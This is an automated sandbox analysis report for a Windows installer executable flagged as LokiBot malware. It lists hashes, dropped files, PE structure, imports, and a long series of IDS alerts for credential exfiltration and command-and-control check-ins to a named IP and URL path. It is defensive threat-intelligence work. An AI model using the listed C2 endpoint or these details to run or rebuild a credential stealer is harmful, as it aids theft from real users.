                  General Information

                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:528740
                  Start date:25.11.2021
                  Start time:18:21:15
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 6m 41s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:U001P56ybm.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:22
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@3/4@0/1
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 63.3% (good quality ratio 61.1%)
                  • Quality average: 78.7%
                  • Quality standard deviation: 27.6%
                  HCA Information:
                  • Successful, ratio: 95%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .exe
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                  • HTTP Packets have been reduced
                  • TCP Packets have been reduced to 100
                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net, arc.msn.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/528740/sample/U001P56ybm.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  18:22:21API Interceptor48x Sleep call for process: U001P56ybm.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  194.85.248.167xA7ry4Ewuk.exeGet hashmaliciousBrowse
                  • 194.85.248.167/imt/fre.php

                  Domains

                  No context

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  DATACENTERROmtSgtqMMFl.exeGet hashmaliciousBrowse
                  • 194.85.248.229
                  W7UbgU8x18.exeGet hashmaliciousBrowse
                  • 194.85.248.219
                  SK TAX INV.exeGet hashmaliciousBrowse
                  • 194.85.248.250
                  xA7ry4Ewuk.exeGet hashmaliciousBrowse
                  • 194.85.248.167
                  Sales Pro forma invoice_SO0005303101427.docxGet hashmaliciousBrowse
                  • 194.85.248.219
                  Statement from QNB.exeGet hashmaliciousBrowse
                  • 194.85.248.156
                  CV.exeGet hashmaliciousBrowse
                  • 194.85.248.250
                  INV.exeGet hashmaliciousBrowse
                  • 194.85.248.250
                  CV.exeGet hashmaliciousBrowse
                  • 194.85.248.250
                  TMR590241368.exeGet hashmaliciousBrowse
                  • 194.85.248.115
                  vIyyHkRXJnGet hashmaliciousBrowse
                  • 194.85.250.154
                  267A80yAhpGet hashmaliciousBrowse
                  • 194.85.250.154
                  QJYxAALd23Get hashmaliciousBrowse
                  • 194.85.250.154
                  z4bJfjXDDQGet hashmaliciousBrowse
                  • 194.85.250.154
                  XXaLHoecGpGet hashmaliciousBrowse
                  • 194.85.250.154
                  AGiCic4uDzGet hashmaliciousBrowse
                  • 194.85.250.154
                  3B3BMxYG8nGet hashmaliciousBrowse
                  • 194.85.250.154
                  6WMo1OYmk3Get hashmaliciousBrowse
                  • 194.85.250.154
                  dycuTng5W8Get hashmaliciousBrowse
                  • 194.85.250.154
                  xINX4f5M8sGet hashmaliciousBrowse
                  • 194.85.250.154

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Temp\9bx9q99412rjuw5u
                  Process:C:\Users\user\Desktop\U001P56ybm.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):217431
                  Entropy (8bit):7.987953901401436
                  Encrypted:false
                  SSDEEP:6144:/KdbhrnUV0fmvApS9oPiEPS3nwOJ2WF9WjNZHq98e2:/crneIEKqN2GWj3r
                  MD5:1B63DA395BAFC5116F3F6FF8AAD7A350
                  SHA1:372869F185066FED68D1573158761EB4859459DB
                  SHA-256:19D7869C47AF19341916AE58B2F82536CF130942C05DFEE3092C65CD0C9E897B
                  SHA-512:E9D93E22D5D4C547A80ACF658C4F2A6409CD00E88F73602789FEED597BEBB6073EEDDBE6A4439C3EC11A26C9EE5D9FF341BB1F8888BFEA751DFA7921E8FA5714
                  Malicious:false
                  Reputation:low
                  Preview: q.........Vl:....m.G.g...0.?#....P....`ZmNwW]&.?..s.........3J.I....".5...W....]A..&..yu....<..WP..........'g..$E...RU.`x.K.mlo.....|..t(Z.JV 4.....q..%M..h..H@]...C.0......2. )=I....n..LX.A..^.x....~!+q...6..J.6..Y.R..q.)4."..+.B.x>..R.,.d...4.<.".Vz0V.O..:...G.g..i0..#....P....`.mNw*]&j?..s...&.n.D.3J..\..`......$....v..'.,...I........o.)....z#..BL9R._..E...RU.]........p........M.i............^....!l2...o+Z...i...4.....e.{....G.B..nH.M..A.Z..c\.T..D....=g.;S.h."....B<.'...&.,.d...4.u....V'...d....g..j.0......P....`ZmNwW]&.?..{....t.b.3J.!X.....:..9. ....v..'.,...].+...o.)....z..a.`9.....E...RU.]......}...p........M.i............^....!l2...o+Z...i...4.....e.{...r.....nH.M..A.Z..c\.T..D....=g..q.)4.".0..B<.'.....,.d...4.u....V....:.m.G.g..0.?#....P....`ZmNwW]&.?..s.......D.3J.....q.....9$.....v..'.,..I........o.)....z#.a.`9.._..E...RU.]........p........M.i............^....!l2...o+Z...i...4.....e.{...r.....nH.M..A.Z..c\.T..D....=g.
                  C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dll
                  Process:C:\Users\user\Desktop\U001P56ybm.exe
                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):120320
                  Entropy (8bit):6.283877419444271
                  Encrypted:false
                  SSDEEP:1536:DkJ/CJk6kcjZwfqMkzLaRJ+cxfNdtTisu01vzG4CNrutUo7HC5mo5wTIDLmUleNg:c6+sz2+cjdx1lmNE7i5IIXRlCi3nJ
                  MD5:7464D22DB87D13EBEF8364866100E33C
                  SHA1:6A64B31B7EE5F853A1CC142D0B3300A796D21B28
                  SHA-256:8142F4110C4DAF020DF138E7A281FD19A3295AF855D7527177E5DAB204EE9D8F
                  SHA-512:E7366C3617B958B3A4FA55548DCE997BD335D7B871494154BA9BDFD077B4C2488D80C9EA571D171B3CCFC18A579ECE85E76AE54C14AF33306BB50AB48BF32631
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 23%
                  Reputation:low
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0.Px^.Px^.Px^....Qx^.]*..px^.]*.._x^.]*..:x^.D.X.Rx^.D.Z.Sx^.D._.Ix^.Px_..x^..&Z.Qx^..&^.Qx^..&..Qx^..&\.Qx^.RichPx^.........PE..L......a...........!.....j...h............................................... ..........................................L...............................................................................@............................................text...dh.......j.................. ..`.bss....D................................rdata..FN.......P...n..............@..@.data...............................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                  Process:C:\Users\user\Desktop\U001P56ybm.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview: 1
                  C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                  Process:C:\Users\user\Desktop\U001P56ybm.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):46
                  Entropy (8bit):1.0424600748477153
                  Encrypted:false
                  SSDEEP:3:/lbON:u
                  MD5:89CA7E02D8B79ED50986F098D5686EC9
                  SHA1:A602E0D4398F00C827BFCF711066E67718CA1377
                  SHA-256:30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
                  SHA-512:C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview: ........................................user.

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                  Entropy (8bit):7.929625872337307
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 92.16%
                  • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:U001P56ybm.exe
                  File size:301040
                  MD5:969e2ccfcacf3573de922d9bce81e3fd
                  SHA1:c3dd33a00d4dad9330d0c2dbc0c3b75396c70f8b
                  SHA256:4a059628d9f56799d68937821b355477502fe0704d41a75c372b1c036061d59f
                  SHA512:9a8e5104bc18ac2bb0987324ce0f602b26ee4435da9d8c869516052067b6d911e4cec839a5619553d15129b6652c75fa489710eca815496b688e25cfeced65bf
                  SSDEEP:6144:rGiOg+450MRKEIC/ICcr8Cnvvso/Y9oPiEPS3nwOJ2YF9WjNZHqo8eXzo9:P5vRYMICasowKqN24Wj3ro9
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.....

                  File Icon

                  Icon Hash:b2a88c96b2ca6a72

                  Static PE Info

                  General

                  Entrypoint:0x4030e3
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  DLL Characteristics:
                  Time Stamp:0x48EFCDCD [Fri Oct 10 21:49:01 2008 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:7fa974366048f9c551ef45714595665e

                  Entrypoint Preview

                  Instruction
                  sub esp, 00000180h
                  push ebx
                  push ebp
                  push esi
                  xor ebx, ebx
                  push edi
                  mov dword ptr [esp+18h], ebx
                  mov dword ptr [esp+10h], 00409158h
                  xor esi, esi
                  mov byte ptr [esp+14h], 00000020h
                  call dword ptr [00407030h]
                  push 00008001h
                  call dword ptr [004070B0h]
                  push ebx
                  call dword ptr [0040727Ch]
                  push 00000008h
                  mov dword ptr [0042EC18h], eax
                  call 00007FD554597328h
                  mov dword ptr [0042EB64h], eax
                  push ebx
                  lea eax, dword ptr [esp+34h]
                  push 00000160h
                  push eax
                  push ebx
                  push 00428F90h
                  call dword ptr [00407158h]
                  push 0040914Ch
                  push 0042E360h
                  call 00007FD554596FDFh
                  call dword ptr [004070ACh]
                  mov edi, 00434000h
                  push eax
                  push edi
                  call 00007FD554596FCDh
                  push ebx
                  call dword ptr [0040710Ch]
                  cmp byte ptr [00434000h], 00000022h
                  mov dword ptr [0042EB60h], eax
                  mov eax, edi
                  jne 00007FD55459480Ch
                  mov byte ptr [esp+14h], 00000022h
                  mov eax, 00434001h
                  push dword ptr [esp+14h]
                  push eax
                  call 00007FD554596AC0h
                  push eax
                  call dword ptr [0040721Ch]
                  mov dword ptr [esp+1Ch], eax
                  jmp 00007FD554594865h
                  cmp cl, 00000020h
                  jne 00007FD554594808h
                  inc eax
                  cmp byte ptr [eax], 00000020h
                  je 00007FD5545947FCh
                  cmp byte ptr [eax], 00000022h
                  mov byte ptr [eax+eax+00h], 00000000h

                  Rich Headers

                  Programming Language:
                  • [EXP] VC++ 6.0 SP5 build 8804

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x74b00xb4.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000x900.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x5b680x5c00False0.67722486413data6.48746502716IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .rdata0x70000x129c0x1400False0.4337890625data5.04904254867IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0x90000x25c580x400False0.58203125data4.76995537906IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .ndata0x2f0000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .rsrc0x370000x9000xa00False0.4078125data3.93441125971IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountry
                  RT_ICON0x371900x2e8dataEnglishUnited States
                  RT_DIALOG0x374780x100dataEnglishUnited States
                  RT_DIALOG0x375780x11cdataEnglishUnited States
                  RT_DIALOG0x376980x60dataEnglishUnited States
                  RT_GROUP_ICON0x376f80x14dataEnglishUnited States
                  RT_MANIFEST0x377100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                  Imports

                  DLLImport
                  KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
                  USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                  GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                  SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                  ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                  ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                  VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  11/25/21-18:22:15.658540TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974480192.168.2.3194.85.248.167
                  11/25/21-18:22:15.658540TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.3194.85.248.167
                  11/25/21-18:22:15.658540TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.3194.85.248.167
                  11/25/21-18:22:15.658540TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24974480192.168.2.3194.85.248.167
                  11/25/21-18:22:18.837898TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974580192.168.2.3194.85.248.167
                  11/25/21-18:22:18.837898TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.3194.85.248.167
                  11/25/21-18:22:18.837898TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.3194.85.248.167
                  11/25/21-18:22:18.837898TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24974580192.168.2.3194.85.248.167
                  11/25/21-18:22:21.772417TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974680192.168.2.3194.85.248.167
                  11/25/21-18:22:21.772417TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974680192.168.2.3194.85.248.167
                  11/25/21-18:22:21.772417TCP2025381ET TROJAN LokiBot Checkin4974680192.168.2.3194.85.248.167
                  11/25/21-18:22:21.772417TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974680192.168.2.3194.85.248.167
                  11/25/21-18:22:21.949354TCP2025483ET TROJAN LokiBot Fake 404 Response8049746194.85.248.167192.168.2.3
                  11/25/21-18:22:23.379975TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974780192.168.2.3194.85.248.167
                  11/25/21-18:22:23.379975TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.3194.85.248.167
                  11/25/21-18:22:23.379975TCP2025381ET TROJAN LokiBot Checkin4974780192.168.2.3194.85.248.167
                  11/25/21-18:22:23.379975TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974780192.168.2.3194.85.248.167
                  11/25/21-18:22:23.474404TCP2025483ET TROJAN LokiBot Fake 404 Response8049747194.85.248.167192.168.2.3
                  11/25/21-18:22:25.292669TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974880192.168.2.3194.85.248.167
                  11/25/21-18:22:25.292669TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974880192.168.2.3194.85.248.167
                  11/25/21-18:22:25.292669TCP2025381ET TROJAN LokiBot Checkin4974880192.168.2.3194.85.248.167
                  11/25/21-18:22:25.292669TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974880192.168.2.3194.85.248.167
                  11/25/21-18:22:25.843662TCP2025483ET TROJAN LokiBot Fake 404 Response8049748194.85.248.167192.168.2.3
                  11/25/21-18:22:26.868772TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.3194.85.248.167
                  11/25/21-18:22:26.868772TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.3194.85.248.167
                  11/25/21-18:22:26.868772TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.3194.85.248.167
                  11/25/21-18:22:26.868772TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974980192.168.2.3194.85.248.167
                  11/25/21-18:22:26.965338TCP2025483ET TROJAN LokiBot Fake 404 Response8049749194.85.248.167192.168.2.3
                  11/25/21-18:22:28.257549TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.3194.85.248.167
                  11/25/21-18:22:28.257549TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.3194.85.248.167
                  11/25/21-18:22:28.257549TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.3194.85.248.167
                  11/25/21-18:22:28.257549TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975080192.168.2.3194.85.248.167
                  11/25/21-18:22:28.383367TCP2025483ET TROJAN LokiBot Fake 404 Response8049750194.85.248.167192.168.2.3
                  11/25/21-18:22:29.608133TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975180192.168.2.3194.85.248.167
                  11/25/21-18:22:29.608133TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975180192.168.2.3194.85.248.167
                  11/25/21-18:22:29.608133TCP2025381ET TROJAN LokiBot Checkin4975180192.168.2.3194.85.248.167
                  11/25/21-18:22:29.608133TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975180192.168.2.3194.85.248.167
                  11/25/21-18:22:30.439113TCP2025483ET TROJAN LokiBot Fake 404 Response8049751194.85.248.167192.168.2.3
                  11/25/21-18:22:31.618850TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975280192.168.2.3194.85.248.167
                  11/25/21-18:22:31.618850TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.3194.85.248.167
                  11/25/21-18:22:31.618850TCP2025381ET TROJAN LokiBot Checkin4975280192.168.2.3194.85.248.167
                  11/25/21-18:22:31.618850TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975280192.168.2.3194.85.248.167
                  11/25/21-18:22:32.376492TCP2025483ET TROJAN LokiBot Fake 404 Response8049752194.85.248.167192.168.2.3
                  11/25/21-18:22:35.179306TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.3194.85.248.167
                  11/25/21-18:22:35.179306TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.3194.85.248.167
                  11/25/21-18:22:35.179306TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.3194.85.248.167
                  11/25/21-18:22:35.179306TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975580192.168.2.3194.85.248.167
                  11/25/21-18:22:35.268660TCP2025483ET TROJAN LokiBot Fake 404 Response8049755194.85.248.167192.168.2.3
                  11/25/21-18:22:37.775846TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975680192.168.2.3194.85.248.167
                  11/25/21-18:22:37.775846TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975680192.168.2.3194.85.248.167
                  11/25/21-18:22:37.775846TCP2025381ET TROJAN LokiBot Checkin4975680192.168.2.3194.85.248.167
                  11/25/21-18:22:37.775846TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975680192.168.2.3194.85.248.167
                  11/25/21-18:22:39.011205TCP2025483ET TROJAN LokiBot Fake 404 Response8049756194.85.248.167192.168.2.3
                  11/25/21-18:22:40.734394TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975780192.168.2.3194.85.248.167
                  11/25/21-18:22:40.734394TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975780192.168.2.3194.85.248.167
                  11/25/21-18:22:40.734394TCP2025381ET TROJAN LokiBot Checkin4975780192.168.2.3194.85.248.167
                  11/25/21-18:22:40.734394TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975780192.168.2.3194.85.248.167
                  11/25/21-18:22:41.150241TCP2025483ET TROJAN LokiBot Fake 404 Response8049757194.85.248.167192.168.2.3
                  11/25/21-18:22:44.172505TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975880192.168.2.3194.85.248.167
                  11/25/21-18:22:44.172505TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975880192.168.2.3194.85.248.167
                  11/25/21-18:22:44.172505TCP2025381ET TROJAN LokiBot Checkin4975880192.168.2.3194.85.248.167
                  11/25/21-18:22:44.172505TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975880192.168.2.3194.85.248.167
                  11/25/21-18:22:44.258064TCP2025483ET TROJAN LokiBot Fake 404 Response8049758194.85.248.167192.168.2.3
                  11/25/21-18:22:45.537822TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.3194.85.248.167
                  11/25/21-18:22:45.537822TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.3194.85.248.167
                  11/25/21-18:22:45.537822TCP2025381ET TROJAN LokiBot Checkin4975980192.168.2.3194.85.248.167
                  11/25/21-18:22:45.537822TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975980192.168.2.3194.85.248.167
                  11/25/21-18:22:46.363115TCP2025483ET TROJAN LokiBot Fake 404 Response8049759194.85.248.167192.168.2.3
                  11/25/21-18:22:47.475042TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976080192.168.2.3194.85.248.167
                  11/25/21-18:22:47.475042TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976080192.168.2.3194.85.248.167
                  11/25/21-18:22:47.475042TCP2025381ET TROJAN LokiBot Checkin4976080192.168.2.3194.85.248.167
                  11/25/21-18:22:47.475042TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976080192.168.2.3194.85.248.167
                  11/25/21-18:22:47.564037TCP2025483ET TROJAN LokiBot Fake 404 Response8049760194.85.248.167192.168.2.3
                  11/25/21-18:22:48.480656TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976180192.168.2.3194.85.248.167
                  11/25/21-18:22:48.480656TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976180192.168.2.3194.85.248.167
                  11/25/21-18:22:48.480656TCP2025381ET TROJAN LokiBot Checkin4976180192.168.2.3194.85.248.167
                  11/25/21-18:22:48.480656TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976180192.168.2.3194.85.248.167
                  11/25/21-18:22:48.579071TCP2025483ET TROJAN LokiBot Fake 404 Response8049761194.85.248.167192.168.2.3
                  11/25/21-18:22:51.071537TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976280192.168.2.3194.85.248.167
                  11/25/21-18:22:51.071537TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976280192.168.2.3194.85.248.167
                  11/25/21-18:22:51.071537TCP2025381ET TROJAN LokiBot Checkin4976280192.168.2.3194.85.248.167
                  11/25/21-18:22:51.071537TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976280192.168.2.3194.85.248.167
                  11/25/21-18:22:51.163780TCP2025483ET TROJAN LokiBot Fake 404 Response8049762194.85.248.167192.168.2.3
                  11/25/21-18:22:52.226443TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.3194.85.248.167
                  11/25/21-18:22:52.226443TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976380192.168.2.3194.85.248.167
                  11/25/21-18:22:52.226443TCP2025381ET TROJAN LokiBot Checkin4976380192.168.2.3194.85.248.167
                  11/25/21-18:22:52.226443TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976380192.168.2.3194.85.248.167
                  11/25/21-18:22:52.969004TCP2025483ET TROJAN LokiBot Fake 404 Response8049763194.85.248.167192.168.2.3
                  11/25/21-18:22:54.348325TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.3194.85.248.167
